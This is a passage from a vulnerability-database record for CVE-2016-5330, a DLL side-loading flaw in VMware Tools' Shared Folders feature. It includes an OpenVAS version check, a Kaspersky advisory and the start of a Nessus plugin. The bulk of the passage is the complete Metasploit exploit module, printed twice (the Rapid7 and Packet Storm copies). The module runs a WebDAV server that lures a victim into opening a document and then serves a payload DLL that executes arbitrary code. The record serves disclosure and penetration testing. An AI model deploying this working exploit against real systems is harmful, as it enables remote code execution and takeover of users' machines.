script_tag(name:\"creation_date\", value:\"2016-09-01 10:20:57 +0530 (Thu, 01 Sep 2016)\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_name(\"VMware Workstation Player 'HGFS' Feature Privilege Escalation Vulnerability (Windows)\");\n\n script_tag(name:\"summary\", value:\"The host is installed with\n VMware Workstation Player and is prone to an important guest privilege\n escalation vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to a DLL hijacking\n vulnerability present in the VMware Tools 'Shared Folders' (HGFS) feature\n running on Microsoft Windows.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow\n local users to gain extra privileges.\");\n\n script_tag(name:\"affected\", value:\"VMware Workstation Player 12.1.x before\n 12.1.1 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to VMware Workstation Player\n version 12.1.1 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://www.vmware.com/security/advisories/VMSA-2016-0010.html\");\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_dependencies(\"gb_vmware_prdts_detect_win.nasl\");\n script_mandatory_keys(\"VMware/Win/Installed\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!vmwareVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(vmwareVer =~ \"^(12\\.1)\")\n{\n if(version_is_less(version:vmwareVer, test_version:\"12.1.1\"))\n {\n report = report_fixed_ver(installed_version:vmwareVer, fixed_version:\"12.1.1\");\n security_message(data:report);\n exit(0);\n }\n}\n", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2020-10-07T20:44:47", "description": "A DLL side loading vulnerability was found in the VMware Host Guest Client Redirector, a component of VMware Tools. This issue can be exploited by luring a victim into opening a document from the attacker's share. An attacker can exploit this issue to execute arbitrary code with the privileges of the target user. This can potentially result in the attacker taking complete control of the affected system. If the WebDAV Mini-Redirector is enabled, it is possible to exploit this issue over the internet.\n", "published": "2016-08-05T18:19:40", "type": "metasploit", "title": "DLL Side Loading Vulnerability in VMware Host Guest Client Redirector", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-5330"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/WINDOWS/MISC/VMHGFS_WEBDAV_DLL_SIDELOAD", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::EXE\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'DLL Side Loading Vulnerability in VMware Host Guest Client Redirector',\n 'Description' => %q{\n A DLL side loading vulnerability was found in the VMware Host Guest Client Redirector,\n a component of VMware Tools. This issue can be exploited by luring a victim into\n opening a document from the attacker's share. An attacker can exploit this issue to\n execute arbitrary code with the privileges of the target user. This can potentially\n result in the attacker taking complete control of the affected system. If the WebDAV\n Mini-Redirector is enabled, it is possible to exploit this issue over the internet.\n },\n 'Author' => 'Yorick Koster',\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2016-5330'],\n ['URL', 'https://securify.nl/advisory/SFY20151201/dll_side_loading_vulnerability_in_vmware_host_guest_client_redirector.html'],\n ['URL', 'http://www.vmware.com/in/security/advisories/VMSA-2016-0010.html'],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread'\n },\n 'Payload' => { 'Space' => 2048, },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Windows x64', {'Arch' => ARCH_X64,} ],\n [ 'Windows x86', {'Arch' => ARCH_X86,} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => '2016-08-05',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptPort.new('SRVPORT', [ true, \"The daemon port to listen on (do not change)\", 80 ]),\n OptString.new('URIPATH', [ true, \"The URI to use (do not change)\", \"/\" ]),\n OptString.new('BASENAME', [ true, \"The base name for the docx file\", \"Document1\" ]),\n OptString.new('SHARENAME', [ true, \"The name of the top-level share\", \"documents\" ])\n ])\n\n # no SSL\n deregister_options('SSL', 'SSLVersion', 'SSLCert')\n end\n\n\n def on_request_uri(cli, request)\n case request.method\n when 'OPTIONS'\n process_options(cli, request)\n when 'PROPFIND'\n process_propfind(cli, request)\n when 'GET'\n process_get(cli, request)\n else\n print_status(\"#{request.method} => 404 (#{request.uri})\")\n resp = create_response(404, \"Not Found\")\n resp.body = \"\"\n resp['Content-Type'] = 'text/html'\n cli.send_response(resp)\n end\n end\n\n\n def process_get(cli, request)\n myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']\n webdav = \"\\\\\\\\#{myhost}\\\\\"\n\n if (request.uri =~ /vmhgfs\\.dll$/i)\n print_status(\"GET => DLL Payload (#{request.uri})\")\n return if ((p = regenerate_payload(cli)) == nil)\n data = generate_payload_dll({ :arch => target['Arch'], :code => p.encoded })\n send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })\n return\n end\n\n if (request.uri =~ /\\.docx$/i)\n print_status(\"GET => DOCX (#{request.uri})\")\n send_response(cli, \"\", { 'Content-Type' => 'application/vnd.openxmlformats-officedocument.wordprocessingml.document' })\n return\n end\n\n if (request.uri[-1,1] == \"/\" or request.uri =~ /index\\.html?$/i)\n print_status(\"GET => REDIRECT (#{request.uri})\")\n resp = create_response(200, \"OK\")\n resp.body = %Q|<html><head><meta http-equiv=\"refresh\" content=\"0;URL=file:\\\\\\\\#{@exploit_unc}#{datastore['SHARENAME']}\\\\#{datastore['BASENAME']}.docx\"></head><body></body></html>|\n resp['Content-Type'] = 'text/html'\n cli.send_response(resp)\n return\n end\n\n print_status(\"GET => 404 (#{request.uri})\")\n resp = create_response(404, \"Not Found\")\n resp.body = \"\"\n cli.send_response(resp)\n end\n\n #\n # OPTIONS requests sent by the WebDav Mini-Redirector\n #\n def process_options(cli, request)\n print_status(\"OPTIONS #{request.uri}\")\n headers = {\n 'MS-Author-Via' => 'DAV',\n 'DASL' => '<DAV:sql>',\n 'DAV' => '1, 2',\n 'Allow' => 'OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH',\n 'Public' => 'OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK',\n 'Cache-Control' => 'private'\n }\n resp = create_response(207, \"Multi-Status\")\n headers.each_pair {|k,v| resp[k] = v }\n resp.body = \"\"\n resp['Content-Type'] = 'text/xml'\n cli.send_response(resp)\n end\n\n #\n # PROPFIND requests sent by the WebDav Mini-Redirector\n #\n def process_propfind(cli, request)\n path = request.uri\n print_status(\"PROPFIND #{path}\")\n body = ''\n\n my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']\n my_uri = \"http://#{my_host}/\"\n\n if path !~ /\\/$/\n\n if blacklisted_path?(path)\n print_status \"PROPFIND => 404 (#{path})\"\n resp = create_response(404, \"Not Found\")\n resp.body = \"\"\n cli.send_response(resp)\n return\n end\n\n if path.index(\".\")\n print_status \"PROPFIND => 207 File (#{path})\"\n body = %Q|<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<D:multistatus xmlns:D=\"DAV:\" xmlns:b=\"urn:uuid:c2f41010-65b3-11d1-a29f-00aa00c14882/\">\n<D:response xmlns:lp1=\"DAV:\" xmlns:lp2=\"http://apache.org/dav/props/\">\n<D:href>#{path}</D:href>\n<D:propstat>\n<D:prop>\n<lp1:resourcetype/>\n<lp1:creationdate>#{gen_datestamp}</lp1:creationdate>\n<lp1:getcontentlength>#{rand(0x100000)+128000}</lp1:getcontentlength>\n<lp1:getlastmodified>#{gen_timestamp}</lp1:getlastmodified>\n<lp1:getetag>\"#{\"%.16x\" % rand(0x100000000)}\"</lp1:getetag>\n<lp2:executable>T</lp2:executable>\n<D:supportedlock>\n<D:lockentry>\n<D:lockscope><D:exclusive/></D:lockscope>\n<D:locktype><D:write/></D:locktype>\n</D:lockentry>\n<D:lockentry>\n<D:lockscope><D:shared/></D:lockscope>\n<D:locktype><D:write/></D:locktype>\n</D:lockentry>\n</D:supportedlock>\n<D:lockdiscovery/>\n<D:getcontenttype>application/octet-stream</D:getcontenttype>\n</D:prop>\n<D:status>HTTP/1.1 200 OK</D:status>\n</D:propstat>\n</D:response>\n</D:multistatus>\n|\n # send the response\n resp = create_response(207, \"Multi-Status\")\n resp.body = body\n resp['Content-Type'] = 'text/xml; charset=\"utf8\"'\n cli.send_response(resp)\n return\n else\n print_status \"PROPFIND => 301 (#{path})\"\n resp = create_response(301, \"Moved\")\n resp[\"Location\"] = path + \"/\"\n resp['Content-Type'] = 'text/html'\n cli.send_response(resp)\n return\n end\n end\n\n print_status \"PROPFIND => 207 Directory (#{path})\"\n body = %Q|<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<D:multistatus xmlns:D=\"DAV:\" xmlns:b=\"urn:uuid:c2f41010-65b3-11d1-a29f-00aa00c14882/\">\n<D:response xmlns:lp1=\"DAV:\" xmlns:lp2=\"http://apache.org/dav/props/\">\n<D:href>#{path}</D:href>\n<D:propstat>\n<D:prop>\n<lp1:resourcetype><D:collection/></lp1:resourcetype>\n<lp1:creationdate>#{gen_datestamp}</lp1:creationdate>\n<lp1:getlastmodified>#{gen_timestamp}</lp1:getlastmodified>\n<lp1:getetag>\"#{\"%.16x\" % rand(0x100000000)}\"</lp1:getetag>\n<D:supportedlock>\n<D:lockentry>\n<D:lockscope><D:exclusive/></D:lockscope>\n<D:locktype><D:write/></D:locktype>\n</D:lockentry>\n<D:lockentry>\n<D:lockscope><D:shared/></D:lockscope>\n<D:locktype><D:write/></D:locktype>\n</D:lockentry>\n</D:supportedlock>\n<D:lockdiscovery/>\n<D:getcontenttype>httpd/unix-directory</D:getcontenttype>\n</D:prop>\n<D:status>HTTP/1.1 200 OK</D:status>\n</D:propstat>\n</D:response>\n|\n\n if request[\"Depth\"].to_i > 0\n trail = path.split(\"/\")\n trail.shift\n case trail.length\n when 0\n body << generate_shares(path)\n when 1\n body << generate_files(path)\n end\n else\n print_status \"PROPFIND => 207 Top-Level Directory\"\n end\n\n body << \"</D:multistatus>\"\n\n body.gsub!(/\\t/, '')\n\n # send the response\n resp = create_response(207, \"Multi-Status\")\n resp.body = body\n resp['Content-Type'] = 'text/xml; charset=\"utf8\"'\n cli.send_response(resp)\n end\n\n def generate_shares(path)\n share_name = datastore['SHARENAME']\n%Q|\n<D:response xmlns:lp1=\"DAV:\" xmlns:lp2=\"http://apache.org/dav/props/\">\n<D:href>#{path}#{share_name}/</D:href>\n<D:propstat>\n<D:prop>\n<lp1:resourcetype><D:collection/></lp1:resourcetype>\n<lp1:creationdate>#{gen_datestamp}</lp1:creationdate>\n<lp1:getlastmodified>#{gen_timestamp}</lp1:getlastmodified>\n<lp1:getetag>\"#{\"%.16x\" % rand(0x100000000)}\"</lp1:getetag>\n<D:supportedlock>\n<D:lockentry>\n<D:lockscope><D:exclusive/></D:lockscope>\n<D:locktype><D:write/></D:locktype>\n</D:lockentry>\n<D:lockentry>\n<D:lockscope><D:shared/></D:lockscope>\n<D:locktype><D:write/></D:locktype>\n</D:lockentry>\n</D:supportedlock>\n<D:lockdiscovery/>\n<D:getcontenttype>httpd/unix-directory</D:getcontenttype>\n</D:prop>\n<D:status>HTTP/1.1 200 OK</D:status>\n</D:propstat>\n</D:response>\n|\n end\n\n def generate_files(path)\n trail = path.split(\"/\")\n return \"\" if trail.length < 2\n\n %Q|\n<D:response xmlns:lp1=\"DAV:\" xmlns:lp2=\"http://apache.org/dav/props/\">\n<D:href>#{path}#{datastore['BASENAME']}.docx</D:href>\n<D:propstat>\n<D:prop>\n<lp1:resourcetype/>\n<lp1:creationdate>#{gen_datestamp}</lp1:creationdate>\n<lp1:getcontentlength>#{rand(0x10000)+120}</lp1:getcontentlength>\n<lp1:getlastmodified>#{gen_timestamp}</lp1:getlastmodified>\n<lp1:getetag>\"#{\"%.16x\" % rand(0x100000000)}\"</lp1:getetag>\n<lp2:executable>T</lp2:executable>\n<D:supportedlock>\n<D:lockentry>\n<D:lockscope><D:exclusive/></D:lockscope>\n<D:locktype><D:write/></D:locktype>\n</D:lockentry>\n<D:lockentry>\n<D:lockscope><D:shared/></D:lockscope>\n<D:locktype><D:write/></D:locktype>\n</D:lockentry>\n</D:supportedlock>\n<D:lockdiscovery/>\n<D:getcontenttype>application/octet-stream</D:getcontenttype>\n</D:prop>\n<D:status>HTTP/1.1 200 OK</D:status>\n</D:propstat>\n</D:response>\n|\n end\n\n def gen_timestamp(ttype=nil)\n ::Time.now.strftime(\"%a, %d %b %Y %H:%M:%S GMT\")\n end\n\n def gen_datestamp(ttype=nil)\n ::Time.now.strftime(\"%Y-%m-%dT%H:%M:%SZ\")\n end\n\n # This method rejects requests that are known to break exploitation\n def blacklisted_path?(uri)\n return true if uri =~ /\\.exe/i\n return true if uri =~ /\\.(config|manifest)/i\n return true if uri =~ /desktop\\.ini/i\n return true if uri =~ /lib.*\\.dll/i\n return true if uri =~ /\\.tmp$/i\n return true if uri =~ /(pcap|packet)\\.dll/i\n false\n end\n\n def exploit\n\n myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST']\n\n @exploit_unc = \"\\\\\\\\#{myhost}\\\\\"\n\n if datastore['SRVPORT'].to_i != 80 || datastore['URIPATH'] != '/'\n fail_with(Failure::Unknown, 'Using WebDAV requires SRVPORT=80 and URIPATH=/')\n end\n\n print_status(\"Files are available at #{@exploit_unc}#{datastore['SHARENAME']}\")\n\n super\n end\nend\n", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/misc/vmhgfs_webdav_dll_sideload.rb"}], "kaspersky": [{"lastseen": "2020-09-02T11:46:28", "bulletinFamily": "info", "cvelist": ["CVE-2016-5330"], "description": "### *Detect date*:\n08/07/2016\n\n### *Severity*:\nWarning\n\n### *Description*:\nUntrusted search path vulnerability was found in VMware products. By exploiting this vulnerability malicious users can gain privileges. This vulnerability can be exploited locally via DLL hijack.\n\n### *Affected products*:\nVMware Workstation 12.1 versions earlier than 12.1.1 \nVMware Player 12.1 versions earlier than 12.1.1 \nVMware Fusion 8.1 versions earlier than 8.1.1\n\n### *Solution*:\nUpdate to the latest version \n[VMware downloads page](<https://my.vmware.com/en/web/vmware/downloads>)\n\n### *Original advisories*:\n[VMware advisory](<http://www.vmware.com/security/advisories/VMSA-2016-0010.html>) \n\n\n### *Impacts*:\nPE \n\n### *Related products*:\n[VMware Workstation](<https://threats.kaspersky.com/en/product/VMware-Workstation/>)\n\n### *CVE-IDS*:\n[CVE-2016-5330](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5330>)4.4Warning", "edition": 43, "modified": "2020-05-22T00:00:00", "published": "2016-08-07T00:00:00", "id": "KLA10854", "href": "https://threats.kaspersky.com/en/vulnerability/KLA10854", "title": "\r KLA10854Privileges escalation vulnerabilities in VMware products ", "type": "kaspersky", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2016-12-05T22:16:02", "description": "", "published": "2016-08-11T00:00:00", "type": "packetstorm", "title": "DLL Side Loading In VMware Host Guest Client Redirector", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-5330"], "modified": "2016-08-11T00:00:00", "id": "PACKETSTORM:138289", "href": "https://packetstormsecurity.com/files/138289/DLL-Side-Loading-In-VMware-Host-Guest-Client-Redirector.html", "sourceData": "`require 'msf/core' \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = NormalRanking \n \ninclude Msf::Exploit::Remote::HttpServer::HTML \ninclude Msf::Exploit::EXE \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'DLL Side Loading Vulnerability in VMware Host Guest Client Redirector', \n'Description' => %q{ \nA DLL side loading vulnerability was found in the VMware Host Guest Client Redirector, \na component of VMware Tools. This issue can be exploited by luring a victim into \nopening a document from the attacker's share. An attacker can exploit this issue to \nexecute arbitrary code with the privileges of the target user. This can potentially \nresult in the attacker taking complete control of the affected system. If the WebDAV \nMini-Redirector is enabled, it is possible to exploit this issue over the internet. \n}, \n'Author' => 'Yorick Koster', \n'License' => MSF_LICENSE, \n'References' => \n[ \n['CVE', '2016-5330'], \n['URL', 'https://securify.nl/advisory/SFY20151201/dll_side_loading_vulnerability_in_vmware_host_guest_client_redirector.html'], \n['URL', 'http://www.vmware.com/in/security/advisories/VMSA-2016-0010.html'], \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'thread' \n}, \n'Payload' => { 'Space' => 2048, }, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Windows x64', {'Arch' => ARCH_X86_64,} ], \n[ 'Windows x86', {'Arch' => ARCH_X86,} ] \n], \n'Privileged' => false, \n'DisclosureDate' => 'Aug 5 2016', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptPort.new('SRVPORT', [ true, \"The daemon port to listen on (do not change)\", 80 ]), \nOptString.new('URIPATH', [ true, \"The URI to use (do not change)\", \"/\" ]), \nOptString.new('BASENAME', [ true, \"The base name for the docx file\", \"Document1\" ]), \nOptString.new('SHARENAME', [ true, \"The name of the top-level share\", \"documents\" ]) \n], self.class) \n \n# no SSL \nderegister_options('SSL', 'SSLVersion', 'SSLCert') \nend \n \n \ndef on_request_uri(cli, request) \ncase request.method \nwhen 'OPTIONS' \nprocess_options(cli, request) \nwhen 'PROPFIND' \nprocess_propfind(cli, request) \nwhen 'GET' \nprocess_get(cli, request) \nelse \nprint_status(\"#{request.method} => 404 (#{request.uri})\") \nresp = create_response(404, \"Not Found\") \nresp.body = \"\" \nresp['Content-Type'] = 'text/html' \ncli.send_response(resp) \nend \nend \n \n \ndef process_get(cli, request) \nmyhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST'] \nwebdav = \"\\\\\\\\#{myhost}\\\\\" \n \nif (request.uri =~ /vmhgfs\\.dll$/i) \nprint_status(\"GET => DLL Payload (#{request.uri})\") \nreturn if ((p = regenerate_payload(cli)) == nil) \ndata = generate_payload_dll({ :arch => target['Arch'], :code => p.encoded }) \nsend_response(cli, data, { 'Content-Type' => 'application/octet-stream' }) \nreturn \nend \n \nif (request.uri =~ /\\.docx$/i) \nprint_status(\"GET => DOCX (#{request.uri})\") \nsend_response(cli, \"\", { 'Content-Type' => 'application/vnd.openxmlformats-officedocument.wordprocessingml.document' }) \nreturn \nend \n \nif (request.uri[-1,1] == \"/\" or request.uri =~ /index\\.html?$/i) \nprint_status(\"GET => REDIRECT (#{request.uri})\") \nresp = create_response(200, \"OK\") \nresp.body = %Q|<html><head><meta http-equiv=\"refresh\" content=\"0;URL=file:\\\\\\\\#{@exploit_unc}#{datastore['SHARENAME']}\\\\#{datastore['BASENAME']}.docx\"></head><body></body></html>| \nresp['Content-Type'] = 'text/html' \ncli.send_response(resp) \nreturn \nend \n \nprint_status(\"GET => 404 (#{request.uri})\") \nresp = create_response(404, \"Not Found\") \nresp.body = \"\" \ncli.send_response(resp) \nend \n \n# \n# OPTIONS requests sent by the WebDav Mini-Redirector \n# \ndef process_options(cli, request) \nprint_status(\"OPTIONS #{request.uri}\") \nheaders = { \n'MS-Author-Via' => 'DAV', \n'DASL' => '<DAV:sql>', \n'DAV' => '1, 2', \n'Allow' => 'OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH', \n'Public' => 'OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK', \n'Cache-Control' => 'private' \n} \nresp = create_response(207, \"Multi-Status\") \nheaders.each_pair {|k,v| resp[k] = v } \nresp.body = \"\" \nresp['Content-Type'] = 'text/xml' \ncli.send_response(resp) \nend \n \n# \n# PROPFIND requests sent by the WebDav Mini-Redirector \n# \ndef process_propfind(cli, request) \npath = request.uri \nprint_status(\"PROPFIND #{path}\") \nbody = '' \n \nmy_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST'] \nmy_uri = \"http://#{my_host}/\" \n \nif path !~ /\\/$/ \n \nif blacklisted_path?(path) \nprint_status \"PROPFIND => 404 (#{path})\" \nresp = create_response(404, \"Not Found\") \nresp.body = \"\" \ncli.send_response(resp) \nreturn \nend \n \nif path.index(\".\") \nprint_status \"PROPFIND => 207 File (#{path})\" \nbody = %Q|<?xml version=\"1.0\" encoding=\"utf-8\"?> \n<D:multistatus xmlns:D=\"DAV:\" xmlns:b=\"urn:uuid:c2f41010-65b3-11d1-a29f-00aa00c14882/\"> \n<D:response xmlns:lp1=\"DAV:\" xmlns:lp2=\"http://apache.org/dav/props/\"> \n<D:href>#{path}</D:href> \n<D:propstat> \n<D:prop> \n<lp1:resourcetype/> \n<lp1:creationdate>#{gen_datestamp}</lp1:creationdate> \n<lp1:getcontentlength>#{rand(0x100000)+128000}</lp1:getcontentlength> \n<lp1:getlastmodified>#{gen_timestamp}</lp1:getlastmodified> \n<lp1:getetag>\"#{\"%.16x\" % rand(0x100000000)}\"</lp1:getetag> \n<lp2:executable>T</lp2:executable> \n<D:supportedlock> \n<D:lockentry> \n<D:lockscope><D:exclusive/></D:lockscope> \n<D:locktype><D:write/></D:locktype> \n</D:lockentry> \n<D:lockentry> \n<D:lockscope><D:shared/></D:lockscope> \n<D:locktype><D:write/></D:locktype> \n</D:lockentry> \n</D:supportedlock> \n<D:lockdiscovery/> \n<D:getcontenttype>application/octet-stream</D:getcontenttype> \n</D:prop> \n<D:status>HTTP/1.1 200 OK</D:status> \n</D:propstat> \n</D:response> \n</D:multistatus> \n| \n# send the response \nresp = create_response(207, \"Multi-Status\") \nresp.body = body \nresp['Content-Type'] = 'text/xml; charset=\"utf8\"' \ncli.send_response(resp) \nreturn \nelse \nprint_status \"PROPFIND => 301 (#{path})\" \nresp = create_response(301, \"Moved\") \nresp[\"Location\"] = path + \"/\" \nresp['Content-Type'] = 'text/html' \ncli.send_response(resp) \nreturn \nend \nend \n \nprint_status \"PROPFIND => 207 Directory (#{path})\" \nbody = %Q|<?xml version=\"1.0\" encoding=\"utf-8\"?> \n<D:multistatus xmlns:D=\"DAV:\" xmlns:b=\"urn:uuid:c2f41010-65b3-11d1-a29f-00aa00c14882/\"> \n<D:response xmlns:lp1=\"DAV:\" xmlns:lp2=\"http://apache.org/dav/props/\"> \n<D:href>#{path}</D:href> \n<D:propstat> \n<D:prop> \n<lp1:resourcetype><D:collection/></lp1:resourcetype> \n<lp1:creationdate>#{gen_datestamp}</lp1:creationdate> \n<lp1:getlastmodified>#{gen_timestamp}</lp1:getlastmodified> \n<lp1:getetag>\"#{\"%.16x\" % rand(0x100000000)}\"</lp1:getetag> \n<D:supportedlock> \n<D:lockentry> \n<D:lockscope><D:exclusive/></D:lockscope> \n<D:locktype><D:write/></D:locktype> \n</D:lockentry> \n<D:lockentry> \n<D:lockscope><D:shared/></D:lockscope> \n<D:locktype><D:write/></D:locktype> \n</D:lockentry> \n</D:supportedlock> \n<D:lockdiscovery/> \n<D:getcontenttype>httpd/unix-directory</D:getcontenttype> \n</D:prop> \n<D:status>HTTP/1.1 200 OK</D:status> \n</D:propstat> \n</D:response> \n| \n \nif request[\"Depth\"].to_i > 0 \ntrail = path.split(\"/\") \ntrail.shift \ncase trail.length \nwhen 0 \nbody << generate_shares(path) \nwhen 1 \nbody << generate_files(path) \nend \nelse \nprint_status \"PROPFIND => 207 Top-Level Directory\" \nend \n \nbody << \"</D:multistatus>\" \n \nbody.gsub!(/\\t/, '') \n \n# send the response \nresp = create_response(207, \"Multi-Status\") \nresp.body = body \nresp['Content-Type'] = 'text/xml; charset=\"utf8\"' \ncli.send_response(resp) \nend \n \ndef generate_shares(path) \nshare_name = datastore['SHARENAME'] \n%Q| \n<D:response xmlns:lp1=\"DAV:\" xmlns:lp2=\"http://apache.org/dav/props/\"> \n<D:href>#{path}#{share_name}/</D:href> \n<D:propstat> \n<D:prop> \n<lp1:resourcetype><D:collection/></lp1:resourcetype> \n<lp1:creationdate>#{gen_datestamp}</lp1:creationdate> \n<lp1:getlastmodified>#{gen_timestamp}</lp1:getlastmodified> \n<lp1:getetag>\"#{\"%.16x\" % rand(0x100000000)}\"</lp1:getetag> \n<D:supportedlock> \n<D:lockentry> \n<D:lockscope><D:exclusive/></D:lockscope> \n<D:locktype><D:write/></D:locktype> \n</D:lockentry> \n<D:lockentry> \n<D:lockscope><D:shared/></D:lockscope> \n<D:locktype><D:write/></D:locktype> \n</D:lockentry> \n</D:supportedlock> \n<D:lockdiscovery/> \n<D:getcontenttype>httpd/unix-directory</D:getcontenttype> \n</D:prop> \n<D:status>HTTP/1.1 200 OK</D:status> \n</D:propstat> \n</D:response> \n| \nend \n \ndef generate_files(path) \ntrail = path.split(\"/\") \nreturn \"\" if trail.length < 2 \n \n%Q| \n<D:response xmlns:lp1=\"DAV:\" xmlns:lp2=\"http://apache.org/dav/props/\"> \n<D:href>#{path}#{datastore['BASENAME']}.docx</D:href> \n<D:propstat> \n<D:prop> \n<lp1:resourcetype/> \n<lp1:creationdate>#{gen_datestamp}</lp1:creationdate> \n<lp1:getcontentlength>#{rand(0x10000)+120}</lp1:getcontentlength> \n<lp1:getlastmodified>#{gen_timestamp}</lp1:getlastmodified> \n<lp1:getetag>\"#{\"%.16x\" % rand(0x100000000)}\"</lp1:getetag> \n<lp2:executable>T</lp2:executable> \n<D:supportedlock> \n<D:lockentry> \n<D:lockscope><D:exclusive/></D:lockscope> \n<D:locktype><D:write/></D:locktype> \n</D:lockentry> \n<D:lockentry> \n<D:lockscope><D:shared/></D:lockscope> \n<D:locktype><D:write/></D:locktype> \n</D:lockentry> \n</D:supportedlock> \n<D:lockdiscovery/> \n<D:getcontenttype>application/octet-stream</D:getcontenttype> \n</D:prop> \n<D:status>HTTP/1.1 200 OK</D:status> \n</D:propstat> \n</D:response> \n| \nend \n \ndef gen_timestamp(ttype=nil) \n::Time.now.strftime(\"%a, %d %b %Y %H:%M:%S GMT\") \nend \n \ndef gen_datestamp(ttype=nil) \n::Time.now.strftime(\"%Y-%m-%dT%H:%M:%SZ\") \nend \n \n# This method rejects requests that are known to break exploitation \ndef blacklisted_path?(uri) \nreturn true if uri =~ /\\.exe/i \nreturn true if uri =~ /\\.(config|manifest)/i \nreturn true if uri =~ /desktop\\.ini/i \nreturn true if uri =~ /lib.*\\.dll/i \nreturn true if uri =~ /\\.tmp$/i \nreturn true if uri =~ /(pcap|packet)\\.dll/i \nfalse \nend \n \ndef exploit \n \nmyhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST'] \n \n@exploit_unc = \"\\\\\\\\#{myhost}\\\\\" \n \nif datastore['SRVPORT'].to_i != 80 || datastore['URIPATH'] != '/' \nfail_with(Failure::Unknown, 'Using WebDAV requires SRVPORT=80 and URIPATH=/') \nend \n \nprint_status(\"Files are available at #{@exploit_unc}#{datastore['SHARENAME']}\") \n \nsuper \nend \nend \n`\n", "cvss": {"score": 4.4, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/138289/vmhgfs_webdav_dll_sideload.rb.txt"}], "nessus": [{"lastseen": "2021-01-01T07:00:24", "description": "The version of VMware Workstation installed on the remote host is\n12.1.x prior to 12.1.1. It is, therefore, affected by an arbitrary\ncode execution vulnerability in the Shared Folders (HGFS) feature due\nto improper loading of Dynamic-link library (DLL) files from insecure\npaths, including the current working directory, which may not be under\nuser control. A remote attacker can exploit this vulnerability, by\nplacing a malicious DLL in the path or by convincing a user into\nopening a file on a network share, to inject and execute arbitrary\ncode in the context of the current user.", "edition": 25, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2016-08-12T00:00:00", "title": "VMware Workstation 12.1.x < 12.1.1 Shared Folders (HGFS) Guest DLL Hijacking Arbitrary Code Execution (VMSA-2016-0010)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-5330"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:vmware:workstation"], "id": "VMWARE_WORKSTATION_WIN_VMSA_2016_0010.NASL", "href": "https://www.tenable.com/plugins/nessus/92947", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(92947);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2019/11/14\");\n\n script_cve_id(\"CVE-2016-5330\");\n script_bugtraq_id(92323);\n script_xref(name:\"VMSA\", value:\"2016-0010\");\n\n script_name(english:\"VMware Workstation 12.1.x < 12.1.1 Shared Folders (HGFS) Guest DLL Hijacking Arbitrary Code Execution (VMSA-2016-0010)\");\n script_summary(english:\"Checks the VMware Workstation version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A virtualization application installed on the remote host is 